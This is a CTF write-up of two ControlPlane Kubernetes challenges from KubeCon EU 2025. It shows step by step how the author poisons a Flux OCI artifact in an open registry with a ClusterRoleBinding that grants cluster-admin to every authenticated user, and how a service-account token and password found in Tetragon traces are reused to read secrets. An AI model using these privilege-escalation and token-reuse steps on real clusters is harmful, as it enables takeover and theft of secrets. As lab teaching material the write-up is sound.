KubeCon EU 2025 CTF Writeup


Introduction

Once again, ControlPlane are running a Kubernetes CTF at KubeCon EU 2025. Let’s have a go at the three challenges; I’m expecting the usual solid quality.

Challenge 1 - Crown Jewels

Let’s get started. SSHing into the first challenge gives us the following message:

Are you ready for the biggest heist of the century? Hidden away in the Tower of London is the crown-jewels.

Time for some malicious operations and be a cheeky git by manipulating your way in.

Good luck!

P.S. Be careful with the soldering iron!

OK, so we need to make our way into the Tower of London. Considering this KubeCon is in London, this feels apt. Let’s see what permissions we have.

$ kubectl auth can-i --list

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

namespaces [] [] [get watch list]

pods [] [] [get watch list]

services [] [] [get watch list]

kustomizations.kustomize.toolkit.fluxcd.io [] [] [get watch list]

ocirepositories.source.toolkit.fluxcd.io [] [] [get watch list]

[/.well-known/openid-configuration/] [] [get]

[/.well-known/openid-configuration] [] [get]

[/api/*] [] [get]

[/api] [] [get]

[/apis/*] [] [get]

[/apis] [] [get]

[/healthz] [] [get]

[/healthz] [] [get]

[/livez] [] [get]

[/livez] [] [get]

[/openapi/*] [] [get]

[/openapi] [] [get]

[/openid/v1/jwks/] [] [get]

[/openid/v1/jwks] [] [get]

[/readyz] [] [get]

[/readyz] [] [get]

[/version/] [] [get]

[/version/] [] [get]

[/version] [] [get]

[/version] [] [get]

serviceaccounts [] [] [list]

Skimming that, we have some interesting permissions and information:

- We can see pods, service accounts, namespaces, services

- The cluster is using Flux (from the Kustomizations and OCI Repositories)

I bet this is a Flux challenge. Let’s quickly enumerate Kustomizations and OCI Repositories.

$ kubectl get -A ocirepositories

NAMESPACE NAME URL READY STATUS AGE

flux-system flux-system oci://registry.zot:5000/kickstart True stored artifact for digest 'latest@sha256:378549b3d42abf3c35f6e8f5f111512a828ca8e4218d1650fa7ddd23f167de69' 4h49m

flux-system podinfo oci://ghcr.io/stefanprodan/manifests/podinfo True stored artifact for digest 'latest@sha256:c379851ecc10baf9888278340bea7094eab19791df0caf23eff1614469414915' 4h49m

flux-system podinfo-reconciliation oci://registry.zot:5000/podinfo True stored artifact for digest 'latest@sha256:60dd3b012c9d4be096467a5898da79d927b44ae91aacccc03d941aa6b89194ba' 4h49m

$ kubectl get -A kustomizations

NAMESPACE NAME AGE READY STATUS

flux-system flux-system 4h49m True Applied revision: latest@sha256:378549b3d42abf3c35f6e8f5f111512a828ca8e4218d1650fa7ddd23f167de69

flux-system podinfo 4h49m True Applied revision: latest@sha256:c379851ecc10baf9888278340bea7094eab19791df0caf23eff1614469414915

flux-system podinfo-reconciliation 4h49m True Applied revision: latest@sha256:60dd3b012c9d4be096467a5898da79d927b44ae91aacccc03d941aa6b89194ba

Also, let’s look at the namespaces:

$ kubectl get ns

NAME STATUS AGE

default Active 4h52m

flux-system Active 4h51m

jumphost Active 4h50m

kube-node-lease Active 4h52m

kube-public Active 4h52m

kube-system Active 4h52m

podinfo Active 4h50m

tower-of-london Active 4h50m

zot Active 4h51m

OK, so with all that information, the notable thing is that Zot (a container registry) is deployed within the zot namespace. Additionally, we can see there is an OCI repository pointing to an image within it. Let’s see if we can pull that and check what’s in there. To access the registry, I used the crane binary.

After downloading and installing it, we can try to list the tags for that image.

$ crane --insecure ls registry.zot:5000/podinfo

latest
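For reference, the tag listing above corresponds to the "list tags" endpoint of the OCI Distribution API, so the same check can be made without crane. A minimal sketch, assuming the registry speaks plain HTTP (which is my reading of needing --insecure here); the helper names and the sample response body are illustrative, not taken from the challenge:

```python
import json
from urllib.parse import quote


def tags_list_url(registry: str, repository: str, scheme: str = "http") -> str:
    """Build the OCI Distribution 'list tags' URL for a repository."""
    # quote() keeps '/' intact, so nested repository names still work.
    return f"{scheme}://{registry}/v2/{quote(repository)}/tags/list"


def parse_tags(body: str) -> list[str]:
    """Extract the tag names from a tags/list JSON response body."""
    # Registries may return null instead of an empty list.
    return json.loads(body).get("tags") or []


if __name__ == "__main__":
    print(tags_list_url("registry.zot:5000", "podinfo"))
    # Hypothetical response body, shaped as the spec describes.
    sample = '{"name": "podinfo", "tags": ["latest"]}'
    print(parse_tags(sample))
```

Fetching the URL (for example with urllib.request.urlopen) and passing the body to parse_tags should give the same list that crane printed.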

So there is just the latest tag for that image. Let’s check what’s in it.

$ mkdir output

$ cd output

$ crane --insecure export registry.zot:5000/podinfo:latest output.tar

$ tar xvf output.tar

podinfo.yaml

$ cat podinfo.yaml

---
apiVersion: v1
kind: Namespace
metadata:
  name: podinfo
---
apiVersion: source.toolkit.fluxcd.io/v1beta2
kind: OCIRepository
metadata:
  name: podinfo
  namespace: flux-system
spec:
  interval: 1m
  url: oci://ghcr.io/stefanprodan/manifests/podinfo
  ref:
    tag: latest
---
apiVersion: kustomize.toolkit.fluxcd.io/v1
kind: Kustomization
metadata:
  name: podinfo
  namespace: flux-system
spec:
  interval: 1m
  targetNamespace: podinfo
  prune: true
  sourceRef:
    kind: OCIRepository
    name: podinfo
  path: ./

Well, those look like standard Kubernetes resources. Flux is a GitOps tool, so that makes sense. Usually the source is a Git repository, but this Kustomization points to an OCI repository instead.

Let’s add some extra resources to this for Flux to deploy. When I first did this, I created a test namespace and pod to confirm that resources were actually being applied. In the end, though, all you need is a ClusterRoleBinding to make everyone cluster admin ;)

The YAML added was:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: read-secrets-global
subjects:
- kind: Group
  name: system:authenticated # Name is case sensitive
  apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: ClusterRole
  name: cluster-admin
  apiGroup: rbac.authorization.k8s.io

Who can be arsed to target a specific service account, let’s just make everyone cluster admin :D

The image looks to be just an empty filesystem containing podinfo.yaml, so let’s build a new image with the modified file (I did this on a remote server and then copied it over to the challenge box).

The Dockerfile used:

FROM scratch

COPY podinfo.yaml /

I built the new image, copied it back to the challenge box, and then pushed it to the Zot registry:

$ crane --insecure push podinfo2.tar registry.zot:5000/podinfo:latest

2025/04/03 13:43:07 existing manifest: latest@sha256:60dd3b012c9d4be096467a5898da79d927b44ae91aacccc03d941aa6b89194ba

registry.zot:5000/podinfo@sha256:60dd3b012c9d4be096467a5898da79d927b44ae91aacccc03d941aa6b89194ba

With that pushed, we wait for Flux to reconcile and deploy our new YAML. Eventually, we are cluster admin :D

$ kubectl auth can-i --list

Resources Non-Resource URLs Resource Names Verbs

*.* [] [] [*]

[*] [] [*]

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

namespaces [] [] [get watch list]

pods [] [] [get watch list]

services [] [] [get watch list]

kustomizations.kustomize.toolkit.fluxcd.io [] [] [get watch list]

ocirepositories.source.toolkit.fluxcd.io [] [] [get watch list]

[/.well-known/openid-configuration/] [] [get]

[/.well-known/openid-configuration] [] [get]

[/api/*] [] [get]

[/api] [] [get]

[/apis/*] [] [get]

[/apis] [] [get]

[/healthz] [] [get]

[/healthz] [] [get]

[/livez] [] [get]

[/livez] [] [get]

[/openapi/*] [] [get]

[/openapi] [] [get]

[/openid/v1/jwks/] [] [get]

[/openid/v1/jwks] [] [get]

[/readyz] [] [get]

[/readyz] [] [get]

[/version/] [] [get]

[/version/] [] [get]

[/version] [] [get]

[/version] [] [get]

serviceaccounts [] [] [list]

$ kubectl -n tower-of-london get secret -o yaml

apiVersion: v1

items:

- apiVersion: v1

data:

flag: ZmxhZ19jdGZ7cGlubmluZ19hbmRfcmVnaXN0cnlfc2VjdXJpdHlfYXJlX2ltcG9ydGFudH0=

kind: Secret

metadata:

annotations:

kubectl.kubernetes.io/last-applied-configuration: |

{"apiVersion":"v1","data":{"flag":"ZmxhZ19jdGZ7cGlubmluZ19hbmRfcmVnaXN0cnlfc2VjdXJpdHlfYXJlX2ltcG9ydGFudH0="},"kind":"Secret","metadata":{"annotations":{},"creationTimestamp":null,"name":"crown-jewels","namespace":"tower-of-london"}}

creationTimestamp: "2025-04-03T08:42:28Z"

name: crown-jewels

namespace: tower-of-london

resourceVersion: "1179"

uid: e3b23cdd-1a4f-4d09-aa54-ac23beb3f2be

type: Opaque

kind: List

metadata:

resourceVersion: ""

$ base64 -d <<< ZmxhZ19jdGZ7cGlubmluZ19hbmRfcmVnaXN0cnlfc2VjdXJpdHlfYXJlX2ltcG9ydGFudH0=

flag_ctf{pinning_and_registry_security_are_important}

There’s the one and only flag :D
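The flag hints at the lesson: the OCIRepository follows the mutable latest tag, so whoever can push to the registry decides what Flux applies. A digest, by contrast, is derived from the content itself. The sketch below only illustrates that idea with made-up bytes; it is not how Flux verifies artifacts internally, and the function names are my own. As far as I know, Flux's OCIRepository can be pointed at a digest under spec.ref instead of a tag, which is the kind of pinning the flag refers to.

```python
import hashlib


def oci_digest(content: bytes) -> str:
    """Return a content digest in the 'sha256:<hex>' form used by OCI registries."""
    return "sha256:" + hashlib.sha256(content).hexdigest()


def matches_pin(content: bytes, pinned_digest: str) -> bool:
    """True only if the content hashes to exactly the pinned digest."""
    return oci_digest(content) == pinned_digest


if __name__ == "__main__":
    # Illustrative stand-ins for the original and the tampered artifact.
    original = b"kind: Namespace\n"
    tampered = original + b"kind: ClusterRoleBinding\n"

    pin = oci_digest(original)          # recorded when the artifact was reviewed
    print(matches_pin(original, pin))   # the reviewed content still matches
    print(matches_pin(tampered, pin))   # the modified content does not
```

A consumer that follows a tag never performs this comparison, which is why overwriting latest was enough here.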

Challenge 2 - Dragon Slayer

Moving on to the next challenge. I like dragons… why are we slaying them… anyways, we have the following message:

___====-_ _-====___

_--^^^#####// \\#####^^^--_

_-^##########// ( ) \\##########^-_

-############// |\^^/| \\############-

_/############// (@::@) \\############\_

/#############(( \\// ))#############\

-###############\\ (oo) //###############-

-#################\\ / VV \ //#################-

-###################\\/ \//###################-

_#/|##########/\######( /\ )######/\##########|\#_

|/ |#/\#/\#/\/ \#/\##\ | | /##/\#/ \/\#/\#/\#| \|

` |/ V V ` V \#\| | | |/#/ V ' V V \| '

` ` ` ` / | | | | \ ' ' ' '

( | | | | )

__\ | | | | /__

(vvv(VVV)(VVV)vvv)

Welcome brave knight! It is time to investigate some strange activity on your cluster.

You have been given access to the mighty Tetragon which can help you understand what

is happening within the "inspect-this-namespace".

Remember chivalrous knights must demonstrate patience and the strength of convinction to

receive the desired insight and immortal glory.

OK, sounds like we need to do some investigating… I do prefer the non-response side of things, but here we are.

So, this is saying we need to investigate the aptly named inspect-this-namespace namespace. Let’s see what permissions we have.

$ kubectl auth can-i --list -n inspect-this-namespace

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

namespaces [] [accessible] [get list]

namespaces [] [inspect-this-namespace] [get list]

namespaces [] [tetragon] [get list]

pods [] [] [get list]

[/.well-known/openid-configuration/] [] [get]

[/.well-known/openid-configuration] [] [get]

[/api/*] [] [get]

[/api] [] [get]

[/apis/*] [] [get]

[/apis] [] [get]

[/healthz] [] [get]

[/healthz] [] [get]

[/livez] [] [get]

[/livez] [] [get]

[/openapi/*] [] [get]

[/openapi] [] [get]

[/openid/v1/jwks/] [] [get]

[/openid/v1/jwks] [] [get]

[/readyz] [] [get]

[/readyz] [] [get]

[/version/] [] [get]

[/version/] [] [get]

[/version] [] [get]

[/version] [] [get]

It looks like we can only get and list pods. However, we also have access to the accessible and tetragon namespaces.

From kubectl auth whoami, it looks like our service account lives in the accessible namespace.

$ kubectl auth whoami

ATTRIBUTE VALUE

Username system:serviceaccount:accessible:tetragona

UID 27985024-7063-4480-8688-8818faf431e6

Groups [system:serviceaccounts system:serviceaccounts:accessible system:authenticated]

Extra: authentication.kubernetes.io/credential-id [JTI=9796fdf3-f682-4747-a8fd-69f421db6d24]

Extra: authentication.kubernetes.io/node-name [node-2]

Extra: authentication.kubernetes.io/node-uid [b22b35af-5903-4a0c-985f-80d360464a6d]

Extra: authentication.kubernetes.io/pod-name [secops]

Extra: authentication.kubernetes.io/pod-uid [9419a304-2b5b-4b39-9a3f-458dc683ace6]

Tetragon sounds super useful here. It is an eBPF-based observability and security tool. I bet we need to use Tetragon to investigate things and that will lead us to the flags. Let’s see how we get access to data within Tetragon quickly.

$ kubectl -n tetragon get pods

NAME READY STATUS RESTARTS AGE

tetragon-gprqs 2/2 Running 0 4h54m

tetragon-operator-7fddfd8fb7-mx555 1/1 Running 0 4h54m

tetragon-pfvvb 2/2 Running 0 4h54m

tetragon-plclt 2/2 Running 0 4h54m

$ kubectl -n tetragon auth can-i --list

Resources Non-Resource URLs Resource Names Verbs

pods/exec [] [] [create]

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

namespaces [] [accessible] [get list]

namespaces [] [inspect-this-namespace] [get list]

namespaces [] [tetragon] [get list]

pods [] [] [get list]

[/.well-known/openid-configuration/] [] [get]

[/.well-known/openid-configuration] [] [get]

[/api/*] [] [get]

[/api] [] [get]

[/apis/*] [] [get]

[/apis] [] [get]

[/healthz] [] [get]

[/healthz] [] [get]

[/livez] [] [get]

[/livez] [] [get]

[/openapi/*] [] [get]

[/openapi] [] [get]

[/openid/v1/jwks/] [] [get]

[/openid/v1/jwks] [] [get]

[/readyz] [] [get]

[/readyz] [] [get]

[/version/] [] [get]

[/version/] [] [get]

[/version] [] [get]

[/version] [] [get]

Nice, it looks like we can execute commands within pods in this namespace, which has four pods: three Tetragon agents and the operator.

$ kubectl -n tetragon get pods -o json | jq '.items[] | .metadata.name + " " + .status.hostIP'

"tetragon-gprqs 10.0.169.102"

"tetragon-operator-7fddfd8fb7-mx555 10.0.169.102"

"tetragon-pfvvb 10.0.128.131"

"tetragon-plclt 10.0.153.189"

Also, each of the non-operator pods is deployed onto a separate node. They most likely belong to a DaemonSet: eBPF is a kernel-level technology, so Tetragon needs an agent on every node.

Let’s see what pods are in the inspect-this-namespace namespace.

$ kubectl -n inspect-this-namespace get pods

NAME READY STATUS RESTARTS AGE

compromised-pod 1/1 Running 0 4h56m

inspect-pod 1/1 Running 0 4h56m

Two running pods, one saying inspect and the other saying compromised. Let’s see which nodes they are on.

$ kubectl -n inspect-this-namespace get pods -o json | jq '.items[] | .metadata.name + " " + .status.hostIP'

"compromised-pod 10.0.169.102"

"inspect-pod 10.0.128.131"

So those map over to tetragon-gprqs and tetragon-pfvvb. Let’s start with the inspect-pod and see what we see.

Execing into tetragon-pfvvb we find.. nothing… wait what.

$ kubectl -n tetragon exec -it tetragon-pfvvb -- bash

Defaulted container "export-stdout" out of: export-stdout, tetragon

error: Internal error occurred: error executing command in container: failed to exec in container: failed to start exec "cd9ebb7c7b295065c6d9e81e59ae8b312e31d908482c77c359001a13363d3077": OCI runtime exec failed: exec failed: unable to start container process: exec: "bash": executable file not found in $PATH: unknown

$ kubectl -n tetragon exec -it tetragon-pfvvb -- sh

Defaulted container "export-stdout" out of: export-stdout, tetragon

~ #

~ #

. break etc/ getopts let return tail umask

: cd eval hash local set test unalias

[ chdir exec help printf sh times unset

[[ command exit history proc/ shift trap usr/

alias continue export hubble-export-stdout pwd sleep true var/

bg dev/ false jobs read source type wait

bin/ echo fg kill readonly sys/ ulimit

Oh, looks like there are 2 containers in this pod. We are jumping into the export-stdout one - but it looks like tetragon is more usefully named ;p

$ kubectl -n tetragon exec -it tetragon-pfvvb -c tetragon -- bash

node-2:/#

That’s better. The tetra client can then help us view events. This is my first time using it, so I did spend some time just googling around on the getevents command to figure it out.

After installing jq, we can then start monitoring for events from the inspect-pod pod. I didn’t add -o compact because I wanted all the data. You never know where a pesky flag is hiding.

node-2:/# tetra getevents --pod inspect-pod | jq

I waited a while, in case there was some sort of cron job or similar. After a few minutes, we get a LOT of data. I’ve snipped out the relevant bit that I found useful.

"parent": {

"exec_id": "bm9kZS0yOjE4NDAzMzI2NTIzNzk5OjI3MTMw",

"pid": 27130,

"uid": 0,

"cwd": "/",

"binary": "/bin/bash",

"arguments": "-c \"curl http://secret-service.abdb042711feecba04cc3aceb9c08c1c.svc.cluster.local:21090/flag -H 'content-type: application/json' -d '{\"password\":\"262d055890faeef180213ca04653fd696d93d0b58fbe4aba21a4069e7e4180b0\"}'\"",

"flags": "execve rootcwd clone inInitTree",

"start_time": "2025-04-03T14:11:35.020476826Z",

"auid": 4294967295,

"pod": {

"namespace": "inspect-this-namespace",

"name": "inspect-pod",

"container": {

"id": "containerd://395c96436529c9f0ceea2c815ef9637e35e38d490cbaa3f44adb255a8f8fbbb6",

"name": "inspect",

"image": {

"id": "docker.io/controlplaneoffsec/dragon-slayer@sha256:599a686d74d0dd1adde10049afb1cce408b15e4965eeee2b3d6139db881b3aaa",

"name": "docker.io/controlplaneoffsec/dragon-slayer:inspect-pod"

},

"start_time": "2025-04-03T09:10:24Z",

"pid": 614

},

"pod_labels": {

"app": "inspect-service"

},

"workload": "inspect-pod",

"workload_kind": "Pod"

},

As can be seen, it looks to be curling a service in a very random namespace for a flag with some authentication credentials. Let’s try replicating that.

root@secops:~# curl http://secret-service.abdb042711feecba04cc3aceb9c08c1c.svc.cluster.local:21090/flag -H 'content-type: application/json' -d '{"password":"262d055890faeef180213ca04653fd696d93d0b58fbe4aba21a4069e7e4180b0"}' -v

That just hung… not great…

It looked like a DNS problem, as curl usually shows the IP once the name resolves. Oh, never mind, it was a bit slow, but it got there:

$ curl http://secret-service.abdb042711feecba04cc3aceb9c08c1c.svc.cluster.local:21090/flag -H 'content-type: application/json' -d '{"password":"262d055890faeef180213ca04653fd696d93d0b58fbe4aba21a4069e7e4180b0"}' -v

* Host secret-service.abdb042711feecba04cc3aceb9c08c1c.svc.cluster.local:21090 was resolved.

* IPv6: (none)

* IPv4: 10.96.12.19

* Trying 10.96.12.19:21090...

* Connected to secret-service.abdb042711feecba04cc3aceb9c08c1c.svc.cluster.local (10.96.12.19) port 21090

> POST /flag HTTP/1.1

> Host: secret-service.abdb042711feecba04cc3aceb9c08c1c.svc.cluster.local:21090

> User-Agent: curl/8.5.0

> Accept: */*

> content-type: application/json

> Content-Length: 79

>

< HTTP/1.1 200 OK

< Content-Type: application/json; charset=utf-8

< Date: Thu, 03 Apr 2025 14:13:26 GMT

< Content-Length: 42

<

* Connection #0 to host secret-service.abdb042711feecba04cc3aceb9c08c1c.svc.cluster.local left intact

"flag_ctf{InspectingNetworkFlows4Secrets}"

Patience is a virtue. One down. Two to go. I didn’t see anything else fancy in the trace for this. So let’s shift to the other.
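Picking that curl command out of the raw stream by eye is tedious, so a small filter helps. The sketch below assumes one JSON event per line (the raw tetra getevents output, or jq -c, rather than pretty-printed jq) and walks each event for any object carrying a binary field, so it does not depend on the exact event layout. The keyword list and the sample events are my own and deliberately shortened:

```python
import json
from typing import Any, Iterable, Iterator


def iter_commands(node: Any) -> Iterator[tuple[str, str]]:
    """Yield (binary, arguments) for every process-like object inside an event."""
    if isinstance(node, dict):
        if "binary" in node:
            yield node["binary"], node.get("arguments", "")
        for value in node.values():
            yield from iter_commands(value)
    elif isinstance(node, list):
        for item in node:
            yield from iter_commands(item)


def interesting(lines: Iterable[str], needles=("curl", "kubectl", "flag")) -> list[str]:
    """Return command lines from JSON-lines events that mention any keyword."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip partial or non-JSON lines
        for binary, arguments in iter_commands(event):
            command = f"{binary} {arguments}".strip()
            if any(needle in command for needle in needles):
                hits.append(command)
    return hits


if __name__ == "__main__":
    # Shortened, hypothetical events; the real ones carry many more fields.
    events = [
        json.dumps({"process_exec": {"process": {"binary": "/bin/sleep", "arguments": "5"}}}),
        json.dumps({"process_exec": {"parent": {
            "binary": "/bin/bash",
            "arguments": '-c "curl http://secret-service.example/flag"',
        }}}),
    ]
    for command in interesting(events):
        print(command)
```

The same filter applies unchanged to the compromised-pod events that follow.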

So the tetragon pod sharing a node with the compromised-pod is tetragon-gprqs. Let’s do something similar and start gathering events on that pod:

$ kubectl -n tetragon exec -ti tetragon-gprqs -c tetragon -- bash

$ tetra getevents --pod compromised-pod | jq

There were a few parts in here that piqued my interest, the first being:

"process": {

"exec_id": "bm9kZS0xOjE5OTM3OTg1OTE5MTA1OjEwNzA5OQ==",

"pid": 107099,

"uid": 0,

"cwd": "/root",

"binary": "/usr/bin/kubectl",

"arguments": "get secrets -n cf6ef10266e5e008fccdc34f444b71e2 --token eyJhbGciOiJSUzI1NiIsImtpZCI6IldFYUNwbHRwRnhfUWZiNGxFeERTcVZBT0Z0a1FNVm1JQ1hhZHdpazF4alEifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzc1MjI0OTEwLCJpYXQiOjE3NDM2ODg5MTAsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiZjY5Y2UwYzMtNzczZC00MzUzLWE2OTAtOWYxMWNmMTk5ZTRiIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJpbnNwZWN0LXRoaXMtbmFtZXNwYWNlIiwibm9kZSI6eyJuYW1lIjoibm9kZS0xIiwidWlkIjoiMTg4ZmFkMjUtNWNmMC00ZmM1LWEzNzEtOGNjODBmOWNhM2MzIn0sInBvZCI6eyJuYW1lIjoiY29tcHJvbWlzZWQtcG9kIiwidWlkIjoiNmQwYjQzMGEtYWE0My00M2E2LWJiM2ItODFmZjRhNGIyNTc1In0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJzZWNyZXRzLWZpbmRlciIsInVpZCI6Ijg4YjhiMjg2LWI3YzgtNGM2Yi1iZjdjLWM2MjA4MDRiMTNhYSJ9LCJ3YXJuYWZ0ZXIiOjE3NDM2OTI1MTd9LCJuYmYiOjE3NDM2ODg5MTAsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDppbnNwZWN0LXRoaXMtbmFtZXNwYWNlOnNlY3JldHMtZmluZGVyIn0.vVZ7yoESG9CHelTA_Rm8S6pUmgohJRbC3UIT93pPzEUGr_JEw5DSo9b0hZUfi7grTeUxg-ougEckklsG-YTh98tvWE7mwlD7w3tOWN8KV0tOoUvbdagbHREqZ7hNc2fPUoeVR7iPr2nBPuMYwzwYCy8N4cxEeiddbq5IizbPMlioyGTkucFhFgCIcEZQ2wwsgBBx7pgqNBa9dx4NpnAuYRGeGA1Fb8AmqNTKdFpySYUS0e4uvet6gmnSArkLQZRKNSmCD1CWGhZR5Uf1s1-NZJnxh0iDsTvb_rSSAOI7gi8Uu3AV7JmaPANu1Kn1Hr7ySR5cGaCpoicPa4RwqEBxdw",

"flags": "execve clone dataArgs inInitTree",

"start_time": "2025-04-03T14:37:01.778141323Z",

"auid": 0,

"pod": {

"namespace": "inspect-this-namespace",

"name": "compromised-pod",

"container": {

"id": "containerd://a19cb90a984b84ec3b9962a432d8159ae810c0783811165ef66599d25809a910",

"name": "compromised-app",

"image": {

"id": "docker.io/controlplaneoffsec/dragon-slayer@sha256:7e22f4fb9c7ab43023fd6ac9b9dafefcb39a1726cb0bd8e02d3e422ca9da097c",

"name": "docker.io/controlplaneoffsec/dragon-slayer:compromised-pod"

},

"start_time": "2025-04-03T09:10:25Z",

"pid": 14621

},

"pod_labels": {

"app": "compromised-service"

},

"workload": "compromised-pod",

"workload_kind": "Pod"

},

"docker": "a19cb90a984b84ec3b9962a432d8159",

"parent_exec_id": "bm9kZS0xOjE5OTM3NzUyODEzNzE3OjEwNzA3Mw==",

"refcnt": 1,

"tid": 107102,

"in_init_tree": true

},

[..SNIP..]

"process": {

"exec_id": "bm9kZS0xOjE5OTM4MjIyMzc5MDQ1OjEwNzExNg==",

"pid": 107116,

"uid": 0,

"cwd": "/root",

"binary": "/usr/bin/cat",

"arguments": "/mnt/sensitive_data/flag",

"flags": "execve clone inInitTree",

"start_time": "2025-04-03T14:37:02.014601031Z",

"auid": 0,

"pod": {

"namespace": "inspect-this-namespace",

"name": "compromised-pod",

"container": {

"id": "containerd://a19cb90a984b84ec3b9962a432d8159ae810c0783811165ef66599d25809a910",

"name": "compromised-app",

"image": {

"id": "docker.io/controlplaneoffsec/dragon-slayer@sha256:7e22f4fb9c7ab43023fd6ac9b9dafefcb39a1726cb0bd8e02d3e422ca9da097c",

"name": "docker.io/controlplaneoffsec/dragon-slayer:compromised-pod"

},

"start_time": "2025-04-03T09:10:25Z",

"pid": 14637

},

"pod_labels": {

"app": "compromised-service"

},

"workload": "compromised-pod",

"workload_kind": "Pod"

},

"docker": "a19cb90a984b84ec3b9962a432d8159",

"parent_exec_id": "bm9kZS0xOjE5OTM3NzUyODEzNzE3OjEwNzA3Mw==",

"tid": 107116,

"in_init_tree": true

},

A nice shiny Kubernetes service account token. How nice. Let’s see what secrets we have in this new random namespace (cf6ef10266e5e008fccdc34f444b71e2). It also looks like there is a flag under /mnt/ in one of the containers.
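Before using a captured token, it is worth checking whose it is. A service account token is a JWT, so its middle segment is base64url-encoded JSON that can be read without the signing key. A minimal sketch; the demo token is built locally with illustrative claims (it is unsigned and would not authenticate anywhere), and make_unsigned_token exists only to keep the example self-contained:

```python
import base64
import json


def b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring the padding JWTs strip off."""
    padding = "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment + padding)


def jwt_claims(token: str) -> dict:
    """Return the (unverified) claims from a JWT's payload segment."""
    _header, payload, _signature = token.split(".")
    return json.loads(b64url_decode(payload))


def make_unsigned_token(claims: dict) -> str:
    """Demo helper: build a structurally valid but unsigned token."""
    def encode(obj: dict) -> str:
        raw = json.dumps(obj, separators=(",", ":")).encode()
        return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()
    return ".".join([encode({"alg": "none"}), encode(claims), "sig"])


if __name__ == "__main__":
    # Illustrative claims only, shaped like a service account token.
    demo = make_unsigned_token(
        {"sub": "system:serviceaccount:inspect-this-namespace:secrets-finder"}
    )
    print(jwt_claims(demo)["sub"])
```

Running jwt_claims on the token from the trace should show its sub claim, which appears to be the secrets-finder service account in inspect-this-namespace. Note that this only reads the claims; it does not verify the signature.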

Let’s aim for the kube token first.

$ kubectl get secrets -n cf6ef10266e5e008fccdc34f444b71e2 --token eyJhbGciOiJSUzI1NiIsImtpZCI6IldFYUNwbHRwRnhfUWZiNGxFeERTcVZBT0Z0a1FNVm1JQ1hhZHdpazF4alEifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzc1MjI0OTEwLCJpYXQiOjE3NDM2ODg5MTAsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiZjY5Y2UwYzMtNzczZC00MzUzLWE2OTAtOWYxMWNmMTk5ZTRiIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJpbnNwZWN0LXRoaXMtbmFtZXNwYWNlIiwibm9kZSI6eyJuYW1lIjoibm9kZS0xIiwidWlkIjoiMTg4ZmFkMjUtNWNmMC00ZmM1LWEzNzEtOGNjODBmOWNhM2MzIn0sInBvZCI6eyJuYW1lIjoiY29tcHJvbWlzZWQtcG9kIiwidWlkIjoiNmQwYjQzMGEtYWE0My00M2E2LWJiM2ItODFmZjRhNGIyNTc1In0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJzZWNyZXRzLWZpbmRlciIsInVpZCI6Ijg4YjhiMjg2LWI3YzgtNGM2Yi1iZjdjLWM2MjA4MDRiMTNhYSJ9LCJ3YXJuYWZ0ZXIiOjE3NDM2OTI1MTd9LCJuYmYiOjE3NDM2ODg5MTAsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDppbnNwZWN0LXRoaXMtbmFtZXNwYWNlOnNlY3JldHMtZmluZGVyIn0.vVZ7yoESG9CHelTA_Rm8S6pUmgohJRbC3UIT93pPzEUGr_JEw5DSo9b0hZUfi7grTeUxg-ougEckklsG-YTh98tvWE7mwlD7w3tOWN8KV0tOoUvbdagbHREqZ7hNc2fPUoeVR7iPr2nBPuMYwzwYCy8N4cxEeiddbq5IizbPMlioyGTkucFhFgCIcEZQ2wwsgBBx7pgqNBa9dx4NpnAuYRGeGA1Fb8AmqNTKdFpySYUS0e4uvet6gmnSArkLQZRKNSmCD1CWGhZR5Uf1s1-NZJnxh0iDsTvb_rSSAOI7gi8Uu3AV7JmaPANu1Kn1Hr7ySR5cGaCpoicPa4RwqEBxdw -o yaml

apiVersion: v1

items:

- apiVersion: v1

data:

flag_2: ZmxhZ19jdGZ7U3RlYWxpbmdUb2tlbnNTdGVhbGluZ1NlY3JldHMhfQ==

kind: Secret

metadata:

creationTimestamp: "2025-04-03T09:10:06Z"

name: flag-2

namespace: cf6ef10266e5e008fccdc34f444b71e2

resourceVersion: "1252"

uid: 9eb2b075-9219-49b7-afb0-76a16b4acaf4

type: Opaque

kind: List

metadata:

resourceVersion: ""

$ base64 -d <<< ZmxhZ19jdGZ7U3RlYWxpbmdUb2tlbnNTdGVhbGluZ1NlY3JldHMhfQ==

flag_ctf{StealingTokensStealingSecrets!}

Excellent, that’s the second flag.

